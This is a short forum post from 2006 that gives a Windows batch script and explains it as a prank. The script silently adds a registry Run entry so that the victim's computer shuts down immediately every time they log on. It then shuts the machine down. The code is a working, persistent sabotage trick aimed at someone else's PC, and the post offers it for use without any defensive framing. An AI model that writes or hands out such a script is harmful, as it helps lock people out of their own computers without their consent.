View Single Post
(#19)
Old
Sifter is Offline
Master of the Post
Sifter is on a distinguished road
 
Posts: 309
Join Date: Jul 2006
Location: Stockton, California
Send a message via AIM to Sifter Send a message via MSN to Sifter Send a message via Yahoo to Sifter
Default 08-20-2006, 12:22 AM

Make a Batch file with any name...
Code:
@ECHO off
CLS
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00
If they are using Windows XP on an admins account, this will make their computer shut off every time they log on to their account.
Reply With Quote